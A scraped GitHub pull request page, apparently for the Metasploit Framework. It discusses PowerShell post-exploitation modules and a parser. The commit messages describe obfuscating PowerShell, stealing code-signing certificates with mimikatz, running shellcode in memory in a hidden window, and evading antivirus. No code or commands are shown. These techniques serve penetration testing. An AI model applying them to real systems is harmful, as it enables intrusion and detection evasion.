Powershell import post #2183
Closed
Powershell import post #2183
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
If the regex fails then the entire moudle would too
Add Rex powershell parser: reads PSH, determines functions, variables, blocks compresses and cleans up the code it's read, obfuscates handles string literals and reserved variable names extracts code blocks and functions for reuse turns powersploit into a useful sub-component for MSF Rewire Msf powershell modules Make use of Rex parser Handles payload generation, substituions Brings convenience methods - byte array generation and download Re-add .NET compiler Compiles .NET code (C#/VB.NET) in memory Can generate binary output file (dynamic persistence) Handles code-signing (steal cert with mimikatz, sign your bin) Not detected by AV (still...) Update payload generation GZip compression and decompression (see Rex module as well) msftidy violations for space efficiency - each char counts Re-submit psexec-psh Makes use of updated Msf and Rex modules Runs shellcode in-memory (in a hidden PSH window) Completely bypasses all AVs tested for the last year...
@g0tm1lk: no clue, you must've pwned me in your sl33p. :)
Resolve conflicts from old code being pulled into master. Conflicts: lib/msf/core/exploit/powershell.rb modules/exploits/windows/smb/psexec_psh.rb
Remove .NET compiler, post lib and modules.
This is temporary and rather messy. Since the internals for dealing with PSH code have moved to Rex there may be a hiccup or two here. This was my original attempt at basic PSH integration and does not make use of the new libraries and namespaces in this PR. Will introduce the updated modules and libraries in separate PR.
Replace powershell lib which snuck in as psexec_psh. Introduce psexec_psh module which uses the Rex and Msf PSH methods provided in the lib import.
… psh_merge Conflicts: modules/exploits/windows/smb/psexec_psh.rb
Looks good from here, though we may want to address the all caps opt names.
… into powershell_import
This is the core post component broken out from rapid7#2075. Includes new post library leveraging the rex and msf namespace changes in lib. Includes basic modules for script and command execution. These modules can be used a simple base for complex powershell execution from post modules and RC scripts.
…t-framework into powershell_import
…t-framework into powershell_import_post
This reverts commit 595e538.
Retab/pr/2183
|
According to gihub, there are conflicts to solve before we can proceed with this. |
|
This pull request is creating conflicts and can't be landed, please @sempervictus feel free to fix the conflicts and reopen again once ready. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR introduces the post modues from #2075. Since they rely on the /lib components in that PR, it is included in this one. We can remove the conflicting components or just commit this PR once we resolve what issues may come.
Notable features of the changes in post are a more in-depth abstraction to simple method calls for executing, cleaning up, and not killing other people's PIDs when running powershell from the "user" side of the framework (writing a post module/rc script). The cleanup process will now check a PID before attempting to kill it, removing the "access denied" errors we were seeing prior when killing a PID which committed suicide anyway.
The modules included are both util modules for executing PSH from a script or a simple command. Point them to a PS1 containing all the relvant pieces of a powersploit attack and they become more than management tools. The post modules and lib illustrate how to consume and prepare PSH code before pushing it to the target system. It is not a long shot from here to write specific modules consuming segments of PSH from different sources, combining, obfuscating, staging, and executig them... with full output.